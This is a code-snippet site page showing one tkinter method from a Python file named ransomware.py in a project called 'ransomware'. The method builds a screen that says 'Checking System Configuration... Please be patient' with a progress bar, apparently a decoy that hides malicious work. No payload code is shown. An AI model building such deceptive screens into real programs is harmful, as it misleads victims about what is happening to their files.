ransomware.py 文件源码

python
阅读 17 收藏 0 点赞 0 评论 0

项目:ransomware 作者: xiaozhouas 项目源码 文件源码
def __init__(self, parent, controller):
        tk.Frame.__init__(self, parent)
        label = ttk.Label(self, text="Checking System Configuration...\nPlease be patient", font=LARGE_FONT)
        label.pack(pady=10,padx=10)

        self.progress = ttk.Progressbar(self, orient="horizontal",
                                        length=200, mode="determinate")
        self.progress.pack()

        self.bytes = 0
        self.maxbytes = 0
        self.start()
评论列表
文章目录


问题


面经


文章

微信
公众号

扫码关注公众号